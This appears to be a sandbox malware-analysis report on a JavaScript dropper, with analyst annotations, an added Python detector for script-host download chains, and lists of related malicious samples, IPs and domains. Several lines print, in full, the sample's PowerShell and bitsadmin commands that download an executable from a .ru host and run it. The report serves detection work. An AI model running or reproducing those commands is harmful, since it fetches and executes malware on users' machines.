Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
  Source: C:\Windows\SysWOW64\wscript.exe | System information queried: KernelDebuggerInformation
Enables debug privileges
  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Creates guard pages, often used to prevent reverse engineering and debugging
  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory allocated: page read and write | page guard
  Note: PAGE_GUARD allocations are routine for a .NET host such as powershell.exe (thread stack guard pages), so this signature carries little weight on its own.

HIPS / PFW / Operating System Protection Evasion:

Bypasses PowerShell execution policy
  Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://slpsrgpsrhojifdij.ru/krablin.exe','C:\Users\user\AppData\Local\Temp\979574639568794.exe');Start-Process 'C:\Users\user\AppData\Local\Temp\979574639568794.exe'
Creates a process in suspended mode (likely to inject code)
  Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c bitsadmin.exe /transfer getitman /download /priority high http://slpsrgpsrhojifdij.ru/krablin.exe C:\Users\user\AppData\Local\Temp\495958594939.exe&start C:\Users\user\AppData\Local\Temp\495958594939.exe
  Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://slpsrgpsrhojifdij.ru/krablin.exe','C:\Users\user\AppData\Local\Temp\979574639568794.exe');Start-Process 'C:\Users\user\AppData\Local\Temp\979574639568794.exe'
  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\bitsadmin.exe bitsadmin.exe /transfer getitman /download /priority high http://slpsrgpsrhojifdij.ru/krablin.exe C:\Users\user\AppData\Local\Temp\495958594939.exe
  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://slpsrgpsrhojifdij.ru/krablin.exe','C:\Users\user\AppData\Local\Temp\979574639568794.exe');Start-Process 'C:\Users\user\AppData\Local\Temp\979574639568794.exe'
  Note: the script launches two independent download-and-execute chains for the same payload URL, one through bitsadmin.exe and one through PowerShell's WebClient, each writing the file under the user's Temp directory and starting it from there.
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
  Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://slpsrgpsrhojifdij.ru/krablin.exe','C:\Users\user\AppData\Local\Temp\979574639568794.exe');Start-Process 'C:\Users\user\AppData\Local\Temp\979574639568794.exe'
  Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://slpsrgpsrhojifdij.ru/krablin.exe','C:\Users\user\AppData\Local\Temp\979574639568794.exe');Start-Process 'C:\Users\user\AppData\Local\Temp\979574639568794.exe'
  Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://slpsrgpsrhojifdij.ru/krablin.exe','C:\Users\user\AppData\Local\Temp\979574639568794.exe');Start-Process 'C:\Users\user\AppData\Local\Temp\979574639568794.exe'
  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://slpsrgpsrhojifdij.ru/krablin.exe','C:\Users\user\AppData\Local\Temp\979574639568794.exe');Start-Process 'C:\Users\user\AppData\Local\Temp\979574639568794.exe'
  Note: in this sample the command line is plaintext, not encoded or packed; its length comes from the inline download-and-execute one-liner.
May try to detect the Windows Explorer process (often used for injection)
  Source: bitsadmin.exe, 00000007.00000002.5552995211.0000000003850000.00000002.sdmp | Binary or memory string: Program Manager
  Source: bitsadmin.exe, 00000007.00000002.5552995211.0000000003850000.00000002.sdmp | Binary or memory string: Shell_TrayWnd
  Source: bitsadmin.exe, 00000007.00000002.5552995211.0000000003850000.00000002.sdmp | Binary or memory string: Progman
  Source: bitsadmin.exe, 00000007.00000002.5552995211.0000000003850000.00000002.sdmp | Binary or memory string: Progmanlock
  Note: bitsadmin.exe is a Windows-supplied utility, so shell window-class names in its memory belong to the system image, not to the sample.
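The chain above (wscript.exe starting cmd.exe, which runs bitsadmin.exe or powershell.exe to fetch krablin.exe into the user's Temp directory and start it) is what a detection engineer would want to catch on process-creation telemetry. The following is an added example, not code from this report or from Joe Sandbox: a small Python detector that replays the report's process tree as constructed Sysmon-style process-creation events and flags a download-and-execute chain whose ancestry includes a script host. The PIDs, the explorer.exe root, the wscript.exe command line and the benign backup.ps1 event are assumptions; the command lines for cmd.exe, bitsadmin.exe and powershell.exe are taken from the report. It generalises slightly beyond the sample by also treating cscript.exe as a script host and certutil.exe as a downloader.

```python
"""Flag LOLBin download-and-execute chains launched from a script host.

Events are modelled on Sysmon Event ID 1 fields (PID, parent PID, image,
command line). The sample events below are constructed; only the cmd.exe,
bitsadmin.exe and powershell.exe command lines come from the report.
"""
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


@dataclass
class Finding:
    rule: str
    pid: int
    image: str
    chain: List[str]      # process ancestry, child first
    urls: List[str]       # remote URLs found on the command line
    dropped: List[str]    # paths written under the user's Temp directory
    executes: bool        # the command line also launches the dropped file
    severity: str


# cscript.exe and certutil.exe are a generalisation; the report only shows
# wscript.exe, bitsadmin.exe and powershell.exe.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
DOWNLOADERS = {"bitsadmin.exe", "powershell.exe", "certutil.exe"}

URL_RE = re.compile(r"https?://[^\s'\"&)]+", re.I)
TEMP_RE = re.compile(r"[a-z]:\\users\\[^\\\s]+\\appdata\\local\\temp\\[^\s'\"&)]+", re.I)
EP_BYPASS_RE = re.compile(r"-e(?:p|x[a-z]*)\s+bypass", re.I)        # -ExecutionPolicy Bypass, -ep bypass
START_RE = re.compile(r"start-process|(?:^|[&|;])\s*start\s", re.I)  # Start-Process or cmd's start


def basename(image: str) -> str:
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parent_chain(by_pid: Dict[int, ProcEvent], pid: int, max_depth: int = 8) -> List[str]:
    """Walk ppid links upward; stops at unknown pids, loops, or max_depth."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen and len(chain) < max_depth:
        seen.add(pid)
        chain.append(basename(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain


def analyze(events: List[ProcEvent]) -> List[Finding]:
    by_pid = {e.pid: e for e in events}
    findings: List[Finding] = []
    for e in events:
        name = basename(e.image)
        chain = parent_chain(by_pid, e.pid)
        urls = URL_RE.findall(e.cmdline)
        dropped = TEMP_RE.findall(e.cmdline)
        executes = START_RE.search(e.cmdline) is not None
        # Low-severity on its own: admins use -ExecutionPolicy Bypass legitimately.
        if name == "powershell.exe" and EP_BYPASS_RE.search(e.cmdline):
            findings.append(Finding("execution_policy_bypass", e.pid, name, chain, urls, dropped, executes, "low"))
        # A downloader fetching a URL straight into %TEMP%; critical when a script host is an ancestor.
        if name in DOWNLOADERS and urls and dropped:
            from_script = any(p in SCRIPT_HOSTS for p in chain[1:])
            rule = "script_host_download_chain" if from_script else "remote_download_to_temp"
            findings.append(Finding(rule, e.pid, name, chain, urls, dropped, executes,
                                    "critical" if from_script else "high"))
    return findings


PS_ONELINER = (r"PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient)"
               r".DownloadFile('http://slpsrgpsrhojifdij.ru/krablin.exe',"
               r"'C:\Users\user\AppData\Local\Temp\979574639568794.exe');"
               r"Start-Process 'C:\Users\user\AppData\Local\Temp\979574639568794.exe'")
BITS_CMD = (r"bitsadmin.exe /transfer getitman /download /priority high "
            r"http://slpsrgpsrhojifdij.ru/krablin.exe C:\Users\user\AppData\Local\Temp\495958594939.exe")

# Constructed events: PIDs, explorer.exe root, the script's location and the backup.ps1 event are assumed.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Windows\SysWOW64\wscript.exe",
              r'wscript.exe "C:\Users\user\Desktop\11Love_You_2019_35210544-txt.js"'),
    ProcEvent(300, 200, r"C:\Windows\SysWOW64\cmd.exe",
              r"'C:\Windows\System32\cmd.exe' /c " + BITS_CMD + r"&start C:\Users\user\AppData\Local\Temp\495958594939.exe"),
    ProcEvent(301, 200, r"C:\Windows\SysWOW64\cmd.exe", r"'C:\Windows\System32\cmd.exe' /c " + PS_ONELINER),
    ProcEvent(400, 300, r"C:\Windows\SysWOW64\bitsadmin.exe", BITS_CMD),
    ProcEvent(401, 301, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe", PS_ONELINER),
    # Benign-looking admin use: policy bypass without a download must not fire the chain rule.
    ProcEvent(500, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"),
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"[{f.severity}] {f.rule}: pid={f.pid} chain={' <- '.join(f.chain)} "
              f"urls={f.urls} dropped={f.dropped} executes={f.executes}")
```

Only the leaf downloader processes are reported, with their full ancestry, so one chain yields one critical finding per downloader rather than one per intermediate cmd.exe; the extracted URL and dropped path double as IOCs for hunting across other hosts.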

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation (3 times)
  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation (8 times)
  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
  Note: volume queries against GAC assemblies and a CatRoot catalog file are the .NET loader and signature verification at work, which every powershell.exe process performs.
Queries the cryptographic machine GUID
  Source: C:\Windows\SysWOW64\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Behavior Graph

Behavior Graph ID: 102817
Sample: 11Love_You_2019_35210544-txt.js
Start date: 11/01/2019
Architecture: WINDOWS
Score: 76

Signatures on the sample itself:
  • JavaScript source code contains functionality to generate code involving HTTP requests or file downloads
  • JavaScript source code contains functionality to generate code involving a shell, file or stream
  • Suspicious powershell command line found
  • 4 other signatures

Process tree (parent -> child), with the signatures and network activity attached to each node:
  wscript.exe
    signatures: Wscript starts Powershell (via cmd or directly); Tries to download files via bitsadmin
    ├─ cmd.exe
    │    signatures: Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); Powershell starts a process from the temp directory; Tries to download and execute files (via powershell)
    │    ├─ powershell.exe
    │    │    signature: Powershell connects to network
    │    │    DNS/IP: slpsrgpsrhojifdij.ru -> 92.63.197.48, port 80 (ITDELUXE-ASRU, Russian Federation)
    │    └─ conhost.exe
    └─ cmd.exe
         signature: Tries to download files via bitsadmin
         ├─ conhost.exe
         └─ bitsadmin.exe

Simulations

Behavior and APIs

Time | Type | Description
20:06:52 | API Interceptor | 51x Sleep call for process: powershell.exe modified

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label | Link
http://www.microsoft.coU | 0% | Avira URL Cloud | safe

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Joe Sandbox View / Context

IPs

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
92.63.197.48Love_You_2018_24451856.js236aa97f9cc30157f5b24fa2907a61a42971e778342063e5610ea0fdb1a50190maliciousBrowse
  • 92.63.197.48/ccc.exe?eDIkHV
5Love_You_2018_32702800.js8a3a9d638a4eeae6dc3cac193c29eddb6ceb90e8dde07bf89203ebedd4926e2cmaliciousBrowse
  • 92.63.197.48/m/s.exe
9Love_You_2018_7425872.js46f8031ebb989c676d360e3d9c1acc489eed5e6d59bdb69095df5810c031f596maliciousBrowse
  • 92.63.197.48/m/s.exe
17Love_You_2018_34926152.js38937923e5d030cb9c7615b7424c3db32e390c5f7582e8fb753272b5b1c5c184maliciousBrowse
  • 92.63.197.48/m/s.exe
3Love_You_2018_8934576.jsb89560cea37849b4d0bd36b3f642db2af3ddcbcd971cf9770c50939fe7a3e8c4maliciousBrowse
  • 92.63.197.48/m/s.exe
7Love_You_2018_21114824.js17e8eeeaae6d82dbbdaa91b88d57d55ac1cc165f77e54075aac84a0ef20097b1maliciousBrowse
  • 92.63.197.48/m/s.exe
1Love_You_2018_35122760.jsc8773c6170b1db92311bda71852f8002ce3240a1aba8f3119cd8d2906f316b3cmaliciousBrowse
  • 92.63.197.48/m/s.exe
3Love_You_2018_10696040.js78daf82c9c74396d354532f244a46ef6e5634b33a27b0ceac965a3855ba37f1dmaliciousBrowse
  • 92.63.197.48/m/s.exe
25Love_You_2018_5622296.js2036af16a6c839d905718e9d6bbfb8b62f33ff7226bdf7e8e883a475f92b3e4bmaliciousBrowse
  • 92.63.197.48/m/s.exe
7Love_You_2018_25044720.jsc0f7906a15850379f883f38ce77d2b00a449292db687799391ac73dc6e9a48efmaliciousBrowse
  • 92.63.197.48/m/s.exe
15Love_You_2018_2924568.js343691d972177727fbcbca66cbe61df7b2b8ec9cc46b04620ed28a5a3dce3f79maliciousBrowse
  • 92.63.197.48/m/s.exe
7Love_You_2018_26025864.js092613677642edeeef8e21a7adc48ac334f7e0bee28e8629a71787a6b646f191maliciousBrowse
  • 92.63.197.48/m/o.exe
3Love_You_2018_23335624.jsc59640a685feaf3981ec41fb6ca6f3896b2aab201edea5a5bc4207ac18d96109maliciousBrowse
  • ssofhoseuegsgrfnu.ru/hello.exe?ksetN
7Love_You_2018_7970952.js53bcb1b4aa7be88161bee9fd980b1b91119ef422d6fc12e5280a6756d9d55078maliciousBrowse
  • ssofhoseuegsgrfnu.ru/hello.exe?ksetN
24Love_You_2018_31235648.jsa92be60a1153ee78d0fd60f73b8a91091063e239b34dbb89962d5a3e6763640bmaliciousBrowse
  • ssofhoseuegsgrfnu.ru/hello.exe?ksetN
9Love_You_2018_3081616.jsd054c07414923261897859449780d9d7215ccc852502cbc3c515a1744b6bb2bamaliciousBrowse
  • ssofhoseuegsgrfnu.ru/hello.exe?IGrq
17Love_You_2018_434386536.js7a73fe8dc6d56993538c5cbc12631c0db6ef93709d54de84ce81cdd1cf54dc2emaliciousBrowse
  • ssofhoseuegsgrfnu.ru/hello.exe?ksetN
19Love_You_2018_146713728.js45f9afb26bba97a5b0f95619c4a268855a66a3499f8f795cb63fd2f707631547maliciousBrowse
  • ssofhoseuegsgrfnu.ru/hello.exe?ksetN
19Love_You_2018_2660864.js797567cf74aa53328db8448be3a86b4991fc1ccb18a358ff7148042f4a9a73camaliciousBrowse
  • ssofhoseuegsgrfnu.ru/hello.exe?IGrq
13Love_You_2018_35724840.js78f1d0d2840ff738d712cf94e0e0f22aa38acddafc2ed00ac6e50005875cc11amaliciousBrowse
  • ssofhoseuegsgrfnu.ru/hello.exe?IGrq

Domains

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
slpsrgpsrhojifdij.ru1Love_You_23798904-2019-txt.js0b3084dd10925e607506e575319e5b5c833de81907f0023b5b546e06da829e3cmaliciousBrowse
  • 92.63.197.48
13Love_You_36092368-2019-txt.jsdbc7fb518d127d1d7ebb008035dca1e871cbee5c1851814c0d8c0fe2ddbecabcmaliciousBrowse
  • 92.63.197.48
19Love_You_33243264-2019-txt.js2dc0fcac81c2c39c7b6c1a94c8788978bc9ebb1027c9cc146e7701c380407b99maliciousBrowse
  • 92.63.197.48
17Love_You_32243160-2019-txt.js676a4a1cd1294ac2e957ea124195b20cb2df16ad7f518013284f6e17d381a5bcmaliciousBrowse
  • 92.63.197.48
28Love_You_14132720-2019-txt.js9634b88629d5c86f10127571ca76fc1b52a690271837f6f0cd8d72c261da1881maliciousBrowse
  • 92.63.197.48
5Love_You_24522872-2019-txt.js62b8c92184ff9c77befd205c19fd0b2a80e730f0553eb8bc1d7ef1cf6f2a2c65maliciousBrowse
  • 92.63.197.48
9Love_You_34685376-2019-txt.js31816bec6de915b7d4cf8bb782a5b4415b825d9be23569618746307fa0922e5cmaliciousBrowse
  • 92.63.197.48
13Love_You_4407632-2019-txt.jsdab0ad1488b82a9468606f2b7d962732808af00baaf2fa0a5b8bfdc00b17d00bmaliciousBrowse
  • 92.63.197.48
7Love_You_24445728-2019-txt.js169b67306c7d13739a9408a416180cee705adc9dec515eb2a58f4227b8bf77e8maliciousBrowse
  • 92.63.197.48
3Love_You_30999304-2019-txt.js3efbfac8cec1a19eb01058641af3cfeb6e294edf4629efc0a624a77093364297maliciousBrowse
  • 92.63.197.48
1Love_You_4038752-2019-txt.js315fb2c7976b523d7cdf6bf2568a8f8f46d63b12e4858fe3aaa06602969f44bbmaliciousBrowse
  • 92.63.197.48
35Love_You_35003568-2019-txt.js6765a93d9c2c84876ef1be94f0398cbd7a05d98362f3a603d9fc51dc76b565ffmaliciousBrowse
  • 92.63.197.48
3Love_You_22152168-2019-txt.js7936b5811989ca7a3972f12bc1c9a3ca1295c34b43c7fbb0157a09fe69342129maliciousBrowse
  • 92.63.197.48
3Love_You_5480552-2019-txt.js456d0173f1122755322c4239fa7673c54fcf9b0ec185d336721c57b0683c1152maliciousBrowse
  • 92.63.197.48
1Love_You_20589904-2019-txt.js42ac22486df6721490650fdba21d58c4a8355ce8f128c2d6b03a6ecbcb4ad761maliciousBrowse
  • 92.63.197.48
1Love_You_25820280-2019-txt.js7efc81eff9874e9b245f75790c624830dae947c90bdf14a8b888d4c6030b7d27maliciousBrowse
  • 92.63.197.48
7Love_You_37480864-2019-txt.jsb8269f93ab46995752ddb315b829eaaf69f9bcd776e614390e88679d4b415153maliciousBrowse
  • 92.63.197.48
7Love_You_21032224-2019-txt.js2e1e449400cdd9085cf94dd2c8e8b7decf43d58a9d51a0057f2fc70eeaebdc71maliciousBrowse
  • 92.63.197.48
29Love_You_2019_22491400-txt.js8de5adb8364fec6b7ae94f87f6f61f1a5e120c2a7977ddf2ec68c2f8b134da34maliciousBrowse
  • 92.63.197.48

ASN

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
ITDELUXE-ASRU13DOC1065095022-PDF.jsadb2f4cb2cd132158a627695d6f3be576bf0062e9d85cc5b458e5cd380fdb2bcmaliciousBrowse
  • 92.63.197.38
3DOC2334611999-PDF.jsb99c026488f28029cf2e8bf61b6eb6e38d9e893a54495ff502d790de3f2c6d40maliciousBrowse
  • 92.63.197.38
41DOC1175989025-PDF.jse80df4c5fe933fca69591d1975a137a51553d5da303c08dfc3a447ecc7a33780maliciousBrowse
  • 92.63.197.38
25DOC8591492391-PDF.js77f974f88a3745da44160d5723a0e51ec2f7136723d3a6c04e8508f6f9a2aaecmaliciousBrowse
  • 92.63.197.59
3DOC2205210520-PDF.jsb400da34f16db0003ce2c83456309f6c1994981771f775a582be11e18117e204maliciousBrowse
  • 92.63.197.59
4220186616_661649.jpg.jsf0e108407264be22bfab325b8cf396fa55daffc408e55485eee3aefba6a4f4d6maliciousBrowse
  • 92.63.197.60
1220186641_664114.jpg.js84a9f144978a7e32095df53271572187467361e93d225ea20c598238cb3c4822maliciousBrowse
  • 92.63.197.60
5720186070_607041.jpg.js948e8cca34a663d01330f3f43049bf48a98f7a4256309fba5721a5b84e61fc1cmaliciousBrowse
  • 92.63.197.60
4320188311_831151.jpg.jsf03f03c89b1e9b92d56c70301364ff432bb5eb2090e3d5594a22fd7c14c697a2maliciousBrowse
  • 92.63.197.60
820186230_623023.jpg.js2f35d861b035723e947404d0ca322f587b7c621b9268434fe8e664daeff286c6maliciousBrowse
  • 92.63.197.60
3620183610_361025.jpg.jscec591843a45daa24c785f09425cd7fd7b171900b2e553fdca2abe5303f89cbamaliciousBrowse
  • 92.63.197.60
4920182341_234146.jpg.jsf3c89f9187c08d195a53d90176f14e469bf65f257815eb273d8211b2458bf8bcmaliciousBrowse
  • 92.63.197.60
1520182903_290342.jpg.jsee7d2971674afc7c547c6e9b896e0488d947da7714b32d53a8bd07140e4f35fcmaliciousBrowse
  • 92.63.197.60
420185977_597762.jpg.js82340710920e31f33039438dca4be5752d2944361d10e919223638dba4de6237maliciousBrowse
  • 92.63.197.60
3520182561_256167.jpg.jsefe52932831967e90d6c53e939c9afbffb8468bb1c5c168691a8e80baf0ef796maliciousBrowse
  • 92.63.197.60
1820183840_384094.jpg.jse9031266ddc9e1e3e169d413a26b4be53bdbaf3329e7d3718019a08b03579bc3maliciousBrowse
  • 92.63.197.60
1020189484_948400.jpg.js08b933aa7a106c4769fe6c817bbfe0c83d54f4ebf3f5a38ed8cfcfac90cd2b66maliciousBrowse
  • 92.63.197.60
5720181654_165464.jpg.jsc0f54a8f0e116e8297ab9695db386a1c09f2a67aa0d49cbd0512cddb13e33101maliciousBrowse
  • 92.63.197.60
1220185723_572394.jpg.jsaeedae6b4791657f3b2d7ff5fa1395655d5682d27af81ff63025d1f08fe388b3maliciousBrowse
  • 92.63.197.60
520185892_589245.jpg.jsf822a799f60e9d2cf154a7906e5bc117c172fa061edf28cd6f6f5a1c9331f5d7maliciousBrowse
  • 92.63.197.60

Dropped Files

No context

Screenshots
